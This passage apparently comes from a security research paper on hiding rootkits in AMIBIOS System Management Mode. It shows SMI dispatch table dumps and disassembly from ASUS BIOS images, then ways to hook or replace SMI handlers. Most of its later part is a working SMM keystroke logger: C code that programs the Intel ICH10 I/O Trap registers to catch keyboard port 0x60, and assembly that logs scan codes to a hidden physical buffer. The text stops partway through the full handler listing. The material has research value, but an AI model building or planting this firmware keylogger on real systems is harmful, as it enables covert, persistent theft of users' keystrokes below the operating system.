+ 0007BF10:  49 A5 EA 47-4C A5 EA 47-92 9B 66 A8-A6 9B 66 A8  I_.GL_.G'>f..>f.
+ 0007BF20:  24 53 4D 49-42 4E 00 00-96 A7 EA 47-A5 A7 EA 47  $SMIBN  -..G_..G
+ 0007BF30:  9F A1 66 A8-B7 A1 66 A8-24 53 4D 49-42 50 00 00  _.f...f.$SMIBP  
+ 0007BF40:  A6 A7 EA 47-B1 A7 EA 47-79 A3 66 A8-9F A3 66 A8  ...G+..Gy_f.__f.
+ 0007BF50:  24 53 4D 49-45 44 00 00-49 AA EA 47-4C AA EA 47  $SMIED  I..GL..G
+ 0007BF60:  10 A4 66 A8-23 A4 66 A8-24 53 4D 49-46 53 00 00   .f.#.f.$SMIFS  
+ 0007BF70:  4D AA EA 47-50 AA EA 47-72 A4 66 A8-84 A4 66 A8  M..GP..Gr.f.".f.
+ 0007BF80:  24 53 4D 49-50 54 00 00-E1 B7 EA 47-F1 B7 EA 47  $SMIPT  ...G...G
+ 0007BF90:  0C A6 66 A8-1E A6 66 A8-24 53 4D 49-42 53 00 00   .f. .f.$SMIBS  
+ 0007BFA0:  F2 B7 EA 47-FE B7 EA 47-C0 A6 66 A8-4D A7 66 A8  ...G...G..f.M.f.
+ 0007BFB0:  24 53 4D 49-42 4F 00 00-FF B7 EA 47-02 B8 EA 47  $SMIBO  ...G ..G
+ 0007BFC0:  08 A8 66 A8-0C A8 66 A8-24 53 4D 49-43 4D 00 00   .f. .f.$SMICM  
+ 0007BFD0:  5D AD 66 A8-60 AD 66 A8-EF AD 66 A8-F1 AD 66 A8  ]-f.`-f..-f..-f.
+ 0007BFE0:  24 53 4D 49-4C 55 00 00-91 AE 66 A8-94 AE 66 A8  $SMILU  'Rf."Rf.
+ 0007BFF0:  A8 AE 66 A8-B5 AE 66 A8-24 53 4D 49-41 42 00 00  .Rf..Rf.$SMIAB  
+ 0007C000:  4D B0 66 A8-50 B0 66 A8-54 B0 66 A8-67 B0 66 A8  M.f.P.f.T.f.g.f.
+ 0007C010:  24 53 4D 49-47 43 00 00-F0 BB 66 A8-F3 BB 66 A8  $SMIGC  .>f..>f.
+ 0007C020:  F4 BB 66 A8-0A BC 66 A8-24 53 4D 49-50 53 00 00  .>f. _f.$SMIPS  
+ 0007C030:  2C BC 66 A8-32 BC 66 A8-33 BC 66 A8-41 BC 66 A8  ,_f.2_f.3_f.A_f.
+ 0007C040:  24 53 4D 49-50 53 00 00-74 BC 66 A8-7A BC 66 A8  $SMIPS  t_f.z_f.
+ 0007C050:  7B BC 66 A8-86 BC 66 A8-24 53 4D 49-47 44 00 00  {_f.+_f.$SMIGD  
+ 0007C060:  C0 BD 66 A8-C3 BD 66 A8-C4 BD 66 A8-F6 BD 66 A8  ._f.._f.._f.._f.
+ 0007C070:  24 53 4D 49-43 45 00 00-50 BF 66 A8-62 BF 66 A8  $SMICE  P.f.b.f.
+ 0007C080:  72 BF 66 A8-8B BF 66 A8-24 53 4D 49-46 45 00 00  r.f.<.f.$SMIFE  
+ 0007C090:  70 D3 EA 47-7F D3 EA 47-17 C4 66 A8-0C D9 66 A8  p..G..G .f. .f.
+ 0007C0A0:  24 53 4D 49-49 4C 00 00-50 D9 66 A8-55 D9 66 A8  $SMIIL  P.f.U.f.
+ 0007C0B0:  5B D9 66 A8-61 D9 66 A8-24 53 4D 49-43 47 00 00  [.f.a.f.$SMICG  
+ 0007C0C0:  B0 DA 66 A8-B6 DA 66 A8-EB DA 66 A8-17 DB 66 A8  ..f...f...f. .f.
+ 0007C0D0:  24 44 45 46-FF 00 01 00-84 E3 EA 47-87 E3 EA 47  $DEF.   "..G+..G
+ 0007C0E0:  86 E9 66 A8-91 E9 66 A8-00 00 00 01-00 00 00 00  +.f.'.f.        
+
+As a small exercise, download .ROM file for any ASUS EeePC netbook and
+find which SMI handlers are present in the EeePC BIOS.
+
+Both tables have the last structure with '$DEF' signature which describes
+default SMI handler invoked when none of other handlers claimed ownership
+of current SMI. It does nothing more than simply clearing all SMI statuses.
+
+From the above tables we can try to reconstruct contents of each table
+entry:
+
+_smi_handler STRUCT
+  signature		BYTE	'$SMI',?,?
+  some_flags		WORD	0
+  some_ptr0		DWORD	?
+  some_ptr1		DWORD	?
+  some_ptr2		DWORD	?
+  handle_smi_ptr	DWORD	?
+_smi_handler ENDS
+
+Each SMI handler entry in SMI dispatch table starts with signature '$SMI'
+followed by 2 characters specific to SMI handler. Only entry for the
+default SMI handler starts with '$DEF' signature.
+
+Each _smi_handler entry contains several pointers to SMI handler functions.
+The most important pointer occupies last 4 bytes, handle_smi_ptr. It points
+to the main handling function of the corresponding SMI handler.
+
+
+
+--[ 2.5 - Disassembling "main" SMI dispatching function
+
+
+A special SMI dispatch routine (let's name it "dispatch_smi") iterates
+through each SMI handler entry in the table and invokes its handle_smi_ptr.
+If none of the registered SMI handlers claimed ownership of the current SMI
+it invokes handle_smi_ptr routine of $DEF handler.
+
+Below is a disassembly of Handle_SMI BIOS function in ASUS P5Q motherboard:
+
+ 0004AF71: 51                           push        cx
+ 0004AF72: 50                           push        ax
+ 0004AF73: 53                           push        bx
+ 0004AF74: 1E                           push        ds
+ 0004AF75: 06                           push        es
+ 0004AF76: 9A0101C8A8                   call        0A8C8:00101  ---X
+ 0004AF7B: 07                           pop         es
+ 0004AF7C: 1F                           pop         ds
+
+ 0004AF7D: C606670300                   mov         b,[0367],000
+
+ 0004AF82: 803E670301                   cmp         b,[0367],001 ;" "
+ ; je _done_handling_smi
+ 0004AF87: 7438                         je          00004AFC1  --->  (1)
+
+ ;
+ ; load CX with number of supported SMI handlers
+ ; done handling SMI if 0
+ ;
+ 0004AF89: 8B0E6003                     mov         cx,[0360]
+ ; jcxz _done_handling_smi
+ 0004AF8D: E332                         jcxz        00004AFC1  --->  (2)
+
+ _iterate_thru_handlers:
+
+ ;
+ ; load GS with index of SMI handler table segment in GDT
+ ; and decrement number of SMI handlers to try
+ ;
+ 0004AF8F: 6828B4                       push        0B428 ;"_("
+ 0004AF92: 0FA9                         pop         gs
+ 0004AF94: 33FF                         xor         di,di
+
+ ;
+ ; handle next SMI
+ ;
+ _handle_next_smi:
+
+ 0004AF96: 49                           dec         cx
+
+ ;
+ ; check some_flags from current _smi_handler entry in the table
+ ;
+ 0004AF97: 658B4506                     mov         ax,gs:[di][06]
+ 0004AF9B: 83E001                       and         ax,001 ;" "
+ 0004AF9E: 7413                         je          00004AFB3  --->  (3)
+
+ 0004AFA0: 51                           push        cx
+ 0004AFA1: 0FA8                         push        gs
+ 0004AFA3: 57                           push        di
+
+ ;
+ ; call SMI handler, handle_smi_ptr of the current
+ ; _smi_handler entry in the dispatch table
+ ;
+ 0004AFA4: 65FF5D14                     call        d,gs:[di][14]
+
+ 0004AFA8: 5F                           pop         di
+ 0004AFA9: 0FA9                         pop         gs
+ 0004AFAB: 59                           pop         cx
+
+ ; jcxz _done_handling_smi
+ 0004AFAC: E313                         jcxz        00004AFC1  --->  (4)
+ 0004AFAE: 83F800                       cmp         ax,000
+ 0004AFB1: 7407                         je          00004AFBA  --->  (5)
+ 0004AFB3: BB1800                       mov         bx,00018 ;"  "
+ 0004AFB6: 03FB                         add         di,bx
+
+ ;
+ ; try next SMI handler entry
+ ;
+ 0004AFB8: EBDC                         jmps        00004AF96  --->  (6) 
+							; _handle_next_smi
+
+ 0004AFBA: B80000                       mov         ax,00000
+ 0004AFBD: 0BC0                         or          ax,ax
+ 0004AFBF: 75C1                         jne         00004AF82  --->  (7)
+
+ ;
+ ; SMI either handled or corresponding handler was not found
+ ; and default handler executed
+ ;
+ _done_handling_smi:
+
+ 0004AFC1: 5B                           pop         bx
+ 0004AFC2: 58                           pop         ax
+ 0004AFC3: 59                           pop         cx
+ 0004AFC4: 5F                           pop         di
+ 0004AFC5: 0FA9                         pop         gs
+ 0004AFC7: CB                           retf
+
+
+
+--[ 2.6 - Hooking SMI handlers
+
+
+Based on the above, there are several ways to hook SMI handlers to add a
+rootkit functionality: add a new SMI handler or patch one of the existing
+SMI handlers. While these two methods aren't significantly different, we
+consider both of them.
+
+1. Adding your own SMI handler and a new entry to SMI dispatch table.
+
+To add a new SMI handler we have to add a new entry to SMI dispatch table.
+Let's add entry with signature '$SMIaa' to the table just before the entry
+for the default SMI handler $DEF:
+
+ 00065E00:  A8 24 53 4D-49 61 61 00-00 AF E8 00-40 B2 E8 00  .$SMIaa  .. @_.
+ 00065E10:  40 9C B3 C8-A8 A7 B3 C8-A8 53 53 44-54 13 06 00  @__..._..SSDT   
+
+This entry contains pointers to default SMI handler functions that may be
+patched. Another method is to find a free space in SMRAM, put shellcode
+there and replace pointers to default SMI handler functions with pointers
+to SMI shellcode.
+
+Additionally, SMI code saves number of active SMI handlers into a variable
+in SMRAM data segment that also should be incremented if a new SMI handler
+is injected.
+
+2. Patching one of the existing SMI handlers.
+
+Let's describe patching existing SMI handler in more details.
+
+Although all BIOS we analyzed are based on the same AMIBIOS 8 core, we
+found that number of $SMI entries in SMI handler tables vary depending on
+motherboard manufacturer and model, chipset manufacturer and model, and
+even on whether it's mobile or server motherboard. SMI handlers typically
+serve as hardware management functions or workaround for hardware bugs.
+Different systems have different needs and therefore different types of
+SMI handlers are present in the BIOS firmware.
+
+Interestingly, some of SMI handlers appear to exist in all BIOS based on
+AMIBIOS 8. Specifically handlers with the following entries in SMI
+dispatch table: $SMICA, $SMISS, $SMISI, $SMIX5, $SMIBP, $SMIED, $SMIFS,
+$SMIBS and obviously $DEF.
+
+The first choice would be to replace one of the SMI handlers present in
+every BIOS based on AMIBIOS 8 core, such as $SMISS. BIOS for ASUS P5Q
+motherboard has $SMISS handler at 000490D3 offset of system BIOS code.
+Below is a snippet of $SMISS handler disassembly:
+
+handle_smi_ss:
+
+ 000490D3: 0E                           push        cs
+ 000490D4: E8D8FF                       call        0000490AF  ---  (1)
+ 000490D7: B80100                       mov         ax,00001 ;"  "
+ 000490DA: 0F82F400                     jb          0000491D2  ---  (2)
+ 000490DE: B81034                       mov         ax,03410 ;"4 "
+
+ ..
+
+ 000491CA: 9AFB00C8A8                   call        0A8C8:000FB  ---X
+ 000491CF: B80000                       mov         ax,00000
+ 000491D2: CB                           retf
+
+After some time spent on reverse engineering this handler one should be
+able to recognize it as a code handling Sleep State requests. It turns out
+that replacing one of the existing SMI handlers may leave the system
+without important functionality or even make the system unstable.
+
+Replacing default SMI handler ($DEF) may be possible if injected payload
+is designed to handle an SMI that isn't supported by the current BIOS. In
+this case no existing SMI handler will claim the SMI and default handler
+will be executed.
+
+Default handler is very basic and has very limited space so it may be
+better to find another victim handler that has more space, present in SMM
+of all BIOS firmware and doesn't implement useful functionality.
+
+Sounds impossible but.. ;) Let's take a look at the SMI handler with
+signature $SMIED. This SMI handler handles software SMI generated by
+writing 0xDE value to APMC port 0xB2:
+
+   _outpd( 0xb2, 0xDE );
+
+It doesn't seem to do anything meaningful but it exists and is the same in
+every BIOS we examined. The purpose of this SMI handler is not entirely
+clear. It seems to be used for debugging.
+
+First of all, we need to find $SMIED handler routines in BIOS binary. SMI
+handlers are trivial to locate, if main routine is found for at least one
+SMI handler in the BIOS binary (remember handle_smi_ptr pointer in
+SMI_HANDLER structure). 
+
+Assume we know location of handle_smi_ss function of $SMISS SMI handler
+described above. This location is offset 0x000490D3 in the system BIOS
+binary.
+
+The last 4 bytes of $SMISS entry in SMI dispatch table are "B5 85 C8 A8"
+which makes handle_smi_ptr = 0xA8C885B5. This is a linear address of the
+main function of $SMISS handler. The last 4 bytes of $SMIED entry in SMI
+dispatch table are "F2 A7 C8 A8" hence the handle_smi_ptr = 0xA8C8A7F2.
+
+This is a linear address of the main function of $SMIED handler. Delta
+between these two linear addresses is 0x223D. By adding this delta to the
+offset of $SMISS SMI handler in the BIOS binary, one can calculate the
+offset of main function of $SMIED or any other SMI handler in the BIOS
+binary.
+
+0x000490D3 + 0x223D = 0x0004B310
+
+Any other SMI handler can be used instead of $SMISS, for example $DEF SMI
+handler which should be the same in all BIOS binaries.
+
+Here's the main function of $SMIED SMI handler:
+
+ 0004B2FD: 50                           push        ax
+ 0004B2FE: E8CCFD                       call        00004B0CD  --- > (1)
+ 0004B301: 720A                         jb          00004B30D  --- > (2)
+ 0004B303: 3CDE                         cmp         al,0DE
+ 0004B305: 7506                         jne         00004B30D  --- > (3)
+ 0004B307: E8E0FD                       call        00004B0EA  --- > (4)
+ 0004B30A: F8                           clc
+ 0004B30B: 58                           pop         ax
+ 0004B30C: CB                           retf
+ 0004B30D: F9                           stc
+ 0004B30E: 58                           pop         ax
+ 0004B30F: CB                           retf
+
+handle_smi_ed:
+
+ 0004B310: 0E                           push        cs
+ 0004B311: E8E9FF                       call        00004B2FD  --- > (5)
+ 0004B314: B80100                       mov         ax,00001 ;"  "
+ 0004B317: 7245                         jb          00004B35E  --- > (6)
+ 0004B319: 6660                         pushad
+ 0004B31B: 1E                           push        ds
+ 0004B31C: 06                           push        es
+ 0004B31D: 680070                       push        07000 ;"p "
+ 0004B320: 1F                           pop         ds
+ 0004B321: 33FF                         xor         di,di
+ 0004B323: 6828B4                       push        0B428 ;"_("
+ 0004B326: 07                           pop         es
+ 0004B327: 33F6                         xor         si,si
+ 0004B329: 268B04                       mov         ax,es:[si]
+ 0004B32C: 8905                         mov         [di],ax
+ 0004B32E: 268B04                       mov         ax,es:[si]
+ 0004B331: 3D2444                       cmp         ax,04424 ;"D$"
+ 0004B334: 750C                         jne         00004B342  --- > (7)
+ 0004B336: BB0200                       mov         bx,00002 ;"  "
+ 0004B339: 268B4402                     mov         ax,es:[si][02]
+ 0004B33D: 3D4546                       cmp         ax,04645 ;"FE"
+ 0004B340: 7408                         je          00004B34A  --- > (8)
+ 0004B342: 83C602                       add         si,002 ;" "
+ 0004B345: 83C702                       add         di,002 ;" "
+ 0004B348: EBDF                         jmps        00004B329  --- > (9)
+ 0004B34A: 268B00                       mov         ax,es:[bx][si]
+ 0004B34D: 8901                         mov         [bx][di],ax
+ 0004B34F: 83C302                       add         bx,002 ;" "
+ 0004B352: 83FB0A                       cmp         bx,00A ;" "
+ 0004B355: 75F3                         jne         00004B34A  --- > (A)
+ 0004B357: 07                           pop         es
+ 0004B358: 1F                           pop         ds
+ 0004B359: 6661                         popad
+ 0004B35B: B80000                       mov         ax,00000
+ 0004B35E: CB                           retf
+
+
+The only thing above "debug" SMI handler does is it simply copies the
+entire SMI dispatch table from 0x0B428:[si] to 0x07000:[di].
+
+So it seems logical and safe to patch this handler routine with our own
+SMI shellcode. The SMI shellcode may be different depending on the
+purpose. We inject SMI keystroke logger similarly to [smm_rkt].
+
+Before we jump to details of SMI keystroke logger handler implementation
+let's discuss methods tha can be used to invoke this SMI keylogger handler
+when keys are pressed on a keyboard.
+
+1. Routing keyboard hardware interrupt (IRQ #01) to SMI using I/O APIC
+
+Authors of [smm_rkt] used I/O Advanced Programmable Interrupt Controller
+(I/O APIC) to redirect keyboard controller hardware interrupt IRQ #01 to
+SMI and capture keystrokes inside hooked SMI handler.
+
+For details of using this method please refer to [smm_rkt]. For details
+on I/O and Local APIC programming, please refer to Chapter 8 of Intel(r)
+IA-32 Architecture Software Developer's Manual [intel_man] or search for
+"APIC programming".
+
+2. I/O Trap on access to keyboard controller data port 0x60
+
+We initially started to use entirely different technique to intercept
+pressed keys in SMI - I/O Trap. It should be noted that this method is
+traditionally used in the BIOS to emulate legacy PS/2 keyboard. Let's
+describe this method in greater details in the next section.
+
+
+
+--[ 3 - SMM KEYLOGGER
+
+
+
+--[ 3.1 - Hardware I/O Trap mechanism
+
+
+One of the ways to implement OS kernel keystroke logger is to hook debug
+trap handler #DB in Interrupt Descriptor Table (IDT) and program hardware
+debug registers DR0-DR3 to trap on access to keyboard controller data port
+0x60.
+
+There has to be similar way to trap into SMI upon access to keyboard I/O
+ports. And, miraculously, there is one - I/O ports 60/64 emulation for the
+USB keyboard. For instance, let's consult to whitepaper describing USB
+support for AMI BIOS [ami_usb]. There we can find the following quote:
+
+[snip]
+
+2.5.4 Port 64/60 Emulation
+This option enables/disables the "Port 60h/64h" trapping option. Port
+60h/64h trapping allows the BIOS to provide full PS/2 based legacy support
+for the USB keyboard and mouse. This option is useful for Microsoft
+Windows NT Operating System and for multi-language keyboards. Also this
+option provides the PS/2 functionalities like keyboard lock, password
+setting, scan code selection etc to USB keyboards.
+
+[/snip]
+
+So to use it for "other" purposes we need to understand what mechanism
+this feature is built upon. The mechanism should be supported by hardware
+so we need to search CPU and chipset specifications. The underlying
+mechanism is supported by both Intel and AMD processors and is referred to
+as "I/O Trap". AMD manual has a section "SMM I/O Trap and I/O Restart"
+[amd_man]. Intel manual describes it in sections "I/O State Implementation"
+and "I/O INSTRUCTION RESTART" [intel_man].
+
+I/O Trap feature allows SMI trapping on access to any I/O port using IN or
+OUT instructions and executing specific SMI handler. Reasoning behind this
+feature is to power on some device being accessed via some I/O port if
+it's powered off. Apparently, I/O Trap is also used for other features
+like emulating 60h/64h keyboard ports in SMI handler for the USB keyboard.
+
+So I/O Trap method is similar to debug trap mentioned above, it traps on
+access to I/O ports, but instead of invoking debug trap handler in OS
+kernel, it generates an SMI interrupt and CPU enters SMM and executes I/O
+Trap SMI handler.
+
+When processor traps I/O instruction and enters SMM mode, it saves all
+information about trapped I/O instruction in SMM Save State Map in the
+field "I/O State Field" at 0x8000 + 0x7FA4 offset from SMBASE. Below we
+provide contents of this field that our keylogger will later need to check:
+
+
+I/O State Field (SMBASE + 0x8000 + 0x7FA4):
++----------+----------+----------+------------+--------+
+| 31    16 | 15     8 | 7      4 | 3        1 | 0      |
++----------+----------+----------+------------+--------+
+| I/O Port | Reserved | I/O Type | I/O Length | IO_SMI |
++----------+----------+----------+------------+--------+
+
+- If set, IO_SMI (bit 0) indicates that this is a I/O Trap SMI.
+- I/O Length (bits [1:3]) indicates if I/O access was byte (001b), word
+  (010b) or dword (100b).
+- I/O Type (bits [4:7]) indicate type of I/O instruction, "IN imm"
+  (1001b), "IN DX" (0001b), etc.
+- I/O Port (bits [16:31]) contain I/O port number that has been accessed.
+
+As we will see in the next section, SMI keylogger will need to update
+saved EAX field in SMM Save State Map if this is IO_SMI, access to port
+0x60 is byte-wide and done via IN DX instruction. Specifically, SMI
+keylogger checks if I/O State field at 0x7FA4 offset has value 0x00600013:
+
+
+mov esi, SMBASE
+mov ecx, dword ptr fs:[esi + 0xFFA4]
+cmp ecx, 0x00600013
+jnz _not_io_smi
+
+
+Above check is simplified. SMI keylogger has to check other values of I/O
+Type and I/O Length bits in I/O State Field.
+
+(*) Remark: for a keylogger purposes, we are only interested in I/O Trap,
+but not in I/O Restart. For the sake of completeness, I/O Restart allows
+IN or OUT instruction, that was interrupted by SMI, to be re-executed
+(or "restarted") after resuming from SMM mode.
+
+It is possible to program I/O Trap on read or write to any I/O port which
+allows anyone to implement SMI handlers that will be invoked on variety of
+interactions between software and hardware devices. We are currently
+interested in trapping read access to keyboard controller data port 0x60.
+
+Let's describe details of how I/O trapping of key pressed on a keyboard
+works:
+
+1. When key is pressed, keyboard controller signals a hardware interrupt
+
+[..Here redirection of IRQ 1 to SMI by I/O APIC would take place..]
+
+2. After receiving hardware keyboard interrupt, APIC invokes keyboard
+interrupt handler routine in IDT (0x93 for PS/2 keyboard)
+
+3. At some point keyboard interrupt handler needs to read a scan code from
+keyboard controller buffer using data port 0x60
+
+[..In a clean system keyboard interrupt handler would decode scan code and
+display it on a screen or handle it normally, but in the hooked system..]
+
+4. Chipset traps read to port 0x60 and signals an I/O Trap SMI
+
+5. In SMM, keystroke logger SMI handler claims ownership of and handles
+this I/O Trap SMI
+
+6. Upon exit from SMM, keystroke logger SMI handler returns result of port
+0x60 read (current scan code) to keyboard interrupt handler in kernel for
+further processing
+
+We described all steps up to the last, step 6, where SMI keylogger returns
+intercepted data to the OS keyboard interrupt handler. Returning
+intercepted scan code is different in SMM keylogger using I/O Trap
+method than in SMM keylogger using I/O APIC. If APIC is used to trigger
+SMI (as in [smm_rkt]), SMI keylogger has to re-inject intercepted scan
+code because it has to be later read by OS keyboard interrupt handler.
+
+On the other side, SMM keylogger that uses I/O Trap method to intercept
+keystrokes traps "IN al, 0x60" instruction executed by OS keyboard
+interrupt handler. This IN instruction cannot be restarted upon resuming
+from SMM as it would cause an infinite loop of SMI traps. Instead, SMI
+handler has to return result of IN instruction in AL/AX/EAX register as if
+IN instruction wasn't trapped at all.
+
+EAX register is saved in SMM Save State Map in SMRAM at an offset 0x7FD0
+from SMBASE + 0x8000 in IA-32 [intel_man] or at an offset 0x7F5C in IA-64.
+So to return correct result of IN instruction our SMI keylogger will need
+to update EAX field with scan code read from port 0x60. Obviously, it
+should update EAX only in case if SMI# is IO_SMI as described above in
+this section.
+
+Let's modify the above snippet and add the code updating EAX:
+
+;
+; verify that this is IO_SMI due to read to 0x60 port
+; then update EAX in SMM state save area (SMBASE + 0x8000 + 0x7FD0)
+;
+mov esi, SMBASE
+mov ecx, dword ptr fs:[esi + 0xFFA4]
+cmp ecx, 0x00600013
+jnz _not_io_smi
+mov byte ptr fs:[esi + 0xFFD0], al
+_not_io_smi:
+; skip this SMI#
+
+
+For the sake of completeness, below we provide a snippet that re-injects
+scan code into keyboard controller buffer which would be used by SMM
+keylogger based on IRQ1 to SMI# APIC redirection:
+
+; read scan code from keyboard controller buffer
+in al, 0x60
+push ax
+; write command byte 0xD2 to command port 0x64
+; to re-inject intercepted scan code into keyboard controller buffer
+; so that OS keyboard interrupt can read and display it later
+mov al, 0xd2
+out 0x64, al
+; wait until keyboard controller is ready to read
+_wait:
+in al, 0x64
+test al, 0x2
+jnz _wait
+; re-inject scan code
+pop ax
+out 0x60, al
+
+
+We described all steps of I/O Trap feature. The next section describes how
+I/O Trap feature can be enabled for SMI keystroke logger to work.
+
+
+
+--[ 3.2 - Programming I/O Trap to capture keystrokes
+
+
+To enable and program I/O Trap mechanism we need to consult with chipset
+specifications. For example, Intel(r) I/O Controller Hub 10 (ICH10) Family
+datasheet [ich] specifies 4 registers IOTR0 - IOTR3 that can provide
+capability to trap access to I/O ports.
+
+IOTRn - I/O Trap Register (0-3)
+Offset Address: 1E80-1E87h Register 0 	Attribute: R/W
+		1E88-1E8Fh Register 1
+		1E90-1E97h Register 2
+		1E98-1E9Fh Register 3
+
+"These registers are used to specify the set of I/O cycles to be trapped
+and to enable this functionality."
+
+All I/O Trap registers are located in Root Complex Base Address Register
+(RCBA) space in ICH. Please refer to sections 10.1.46-49 of [ich] for
+details of I/O Trap registers.
+
+- I/O Trap 0-3 (IOTRn) registers are at the offsets 0x1E80 through 0x1E9F
+  from RCBA.
+- Trap Status Register (TRST) is at offset 1E00h from RCBA. Contains 4
+  status bits indicating that access was trapped by one of IOTRn traps.
+- Trapped Cycle Register (TRCR) is at offset 1E10h from RCBA. This
+  register contains data written to trapped I/O port. It's not used when
+  trapping read cycles.
+
+RCBA value can be read from ICH PCI configuration register B:D:F = 0:31:0,
+offset 0xF0.
+
+   //
+   // Read the Root Complex Base Address Register (RCBA)
+   //  
+
+   // LPC device in ICH, B:D:F = 0:31:0
+   lpc_rcba_addr = pci_addr( 0, 31, 0, LPC_RCBA_REG );
+   _outpd( 0xcf8, lpc_rcba_addr );
+   rcba_reg = _inpd( 0xcfc );
+   pa.LowPart = rcba_reg & 0xffffc000;
+
+   // 0x2000 is enough to access I/O Trap range
+   rcba = MmMapIoSpace( pa, 0x2000, MmCached );
+
+Each IOTRn register contains the following important bits that we'll need
+to use:
+
+Bit 0 	   Trap and SMI# Enable (TRSE)
+	   0 = Trapping and SMI# logic disabled.
+	   1 = The trapping logic specified in this register is enabled.
+..
+Bits 15:2  I/O Address[15:2] (IOAD)
+	   dword-aligned address
+..
+Bits 35:32 Byte Enables (TBE)
+	   Active-high dword-aligned byte enables.
+..
+Bit 48	   Read/Write# (RWIO)
+	   0 = Write
+	   1 = Read
+	   NOTE: The value in this field does not matter if bit 49 is set.
+
+To enable trapping read accesses to keyboard controller data port 0x60 one
+of IOTRn registers (for example, IOTR0) have to be programmed as follows:
+- lower DWORD of IOTR0 should be programmed to value 0x61 (IOAD = 0x60,
+  TRSE = 1)
+- higher DWORD of IOTR0 should be programmed to value 0x100f0 (TBE = 0xf,
+  RWIO = 1)
+
+A snippet of code that programs IOTR0 looks as follows:
+
+   //
+   // Program I/O Trap to trap on every read from
+   // keyboard controller data port 0x60
+   //
+
+   pIOTR0_LO = (DWORD *)(rcba + RCBA_IOTR0_LO);
+   pIOTR0_HI = (DWORD *)(rcba + RCBA_IOTR0_HI);
+
+   // trap on port read + all byte enables
+   *(DWORD*)pIOTR0_HI = 0x100f0;
+   // keyboard controller port 0x60 + 1 enable I/O Trap
+   *(DWORD*)pIOTR0_LO = 0x61;
+
+For a complete source code please refer to the end of the paper.
+
+In the next section we will describe full implementation of I/O Trap SMI
+handler used to trap on keyboard interrupts.
+
+Here we need to note the following. I/O Trap SMI handler needs to disable
+I/O Trap at the beginning of SMI handler and re-enable I/O Trap upon
+resuming from SMM. I/O Trap SMI handler should include these instructions:
+
+; I/O Trap Register 0 = RCBA + 1E80h
+IO_TRAP_IOTR0_REG	equ	FED1DE80h
+
+mov edx, IO_TRAP_IOTR0_REG
+mov dword ptr [edx], 0
+
+; handle I/O Trap SMI
+
+mov edx, IO_TRAP_IOTR0_REG
+mov eax, 0x61
+mov dword ptr [edx], eax
+
+The above code first disables SMI I/O Trap by writing 0 to FED1DE80h MMIO
+address (I/O Trap Register 0 = RCBA + 1E80h) and then after handling SMI,
+writes 0x61 value to this register to re-enable I/O trap on read access to
+port 0x60.
+
+
+At this point we should have everything we need to modify SMI handler and
+add a keystroke logger payload into SMM.
+
+
+
+--[ 3.3 - System Management Mode keylogger
+
+
+First thing to understand about SMI based keylogger is that it executes
+in the specific environment set up by BIOS and SMI code. Despite that the
+keylogger has similarities with kernel keylogger, it has a lot of SMI
+specifics.
+
+We tested described keylogger mechanism with only PS/2 keyboards.
+
+We'll be designing SMI keylogger to directly query keyboard controller
+data port 0x60 and read scan codes sent as interrupts when user presses or
+releases any key on a keyboard.
+
+Keyloggers that directly read port 0x60 typically need to re-inject read
+scan code back to keyboard controller buffer using the same data port 0x60
+such that software up in the stack can read and process this scan code
+without noticing that it was intercepted by the keylogger.
+
+In this paper we use I/O Trap mechanism to trigger SMI keylogger payload.
+I/O Trap mechanism does not require re-injecting scan codes. This will be
+explained later. Furthermore, keylogger will not work if it re-injects
+scan code.
+
+Below we provide an assembly of SMI keystroke logger payload based on I/O
+Trap method. It reads scan codes and dumps them to some physical address
+from where they can be extracted later. A complete code of SMI handler
+implementing I/O Trap based SMI keylogger will be provided in the next
+section.
+
+
+pusha
+
+;
+; verify that this is IO_SMI due to read to 0x60 port
+;
+mov esi, SMBASE
+mov ecx, dword ptr [esi + 0xFFA4]
+cmp ecx, 0x00600013
+jnz _not_io_smi
+
+;
+; read scan code from keyboard controller port 0x60
+;
+xor ax, ax
+in al, 60h
+
+;
+; log intercepted scan code (to LOG_BUFFER_PHYS_ADDR physical address)
+; the first dword is a number of scan code bytes saved in the buffer
+;
+mov edi, DST_BUF_PHYSADDR
+mov ecx, dword ptr [edi]
+push edi
+lea edi, dword ptr [edi + ecx + 4]
+mov byte ptr [edi], al
+
+;
+; increment number of scan code bytes saved in the buffer
+;
+inc ecx
+pop edi
+mov dword ptr [edi], ecx
+
+;
+; update EAX field in SMM state save map (SMBASE + 0x8000 + SMM_MAP_EAX)
+; with scan code to be returned as a result of trapped IN instruction
+;
+mov byte ptr [esi + 0xFFD0], al
+
+_not_io_smi:
+
+popa
+
+
+The next section provides full description of SMI handler that implements
+functions of SMM keylogger based on I/O Trap keystroke interception method.
+
+
+
+--[ 3.4 - I/O Trap based keystroke logger SMI handler
+
+
+From the description in the previous sections I/O Trap method works like
+this:
+
+1. CPU issues read or write to some I/O port.
+
+2. Chipset traps this access, decodes port number and width, read vs.
+write access and consults to I/O Trap registers programmed by kernel mode
+software.
+
+3. If I/O port access corresponds to programmed in I/O Trap registers,
+chipset asserts SMI# of the CPU.
+
+4. CPU enters System Management Mode an jumps to SMI handler that claims
+ownership of I/O Trap SMI.
+
+The way to use I/O Trap mechanism to log keystrokes entered on target
+system is to program chipset to trap on read to keyboard controller data
+port 0x60 and issue SMI# which will invoke SMI handler that will log scan
+code read from port 0x60.
+
+Once invoked, after read to port 0x60 was trapped, SMI keylogger should 
+take the following actions:
+
+1. Determine if SMI is due to an I/O Trap on read access to keyboard
+controller port.
+
+2. Clear I/O Trap status bit in TRST MMIO register at address 0xFED1DE00.
+
+3. Temporarily disable I/O Trap by clearing IOTRn register at 0xFED1DE80,
+because later it will need to read from the trapped port.
+
+4. Check in TRCR MMIO register at 0xFED1DE10 whether read or write to port
+was trapped.
+
+5. Read scan code from keyboard controller port 0x60 and store it somewhere
+in the keystroke log buffer to extract later or transmit it over the
+network.
+
+4. Update saved EAX register in SMM state save area with read scan code
+such that when SMI resumes to protected mode, correct scan code is
+returned to interrupted instructions in kernel keyboard interrupt handler
+routine.
+
+5. Re-enable I/O Trap on read access to keyboard controller port 0x60 by
+writing 0x61 to IOTRn register to enable trapping for the next keystroke
+after resuming from SMM to normal OS execution.
+
+6. Return from SMI handler code indicating to main SMI dispatch function
+that SMI was claimed and handled.
+
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+;;
+;; I/O Trap based SMI keystroke logger
+;;
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+
+;
+; I/O Trap registers in Root Complex Base Address (RCBA)
+;
+IO_TRAP_IOTR0_REG	equ FED1DE80h ; I/O Trap Register 0 = RCBA + 1E80h
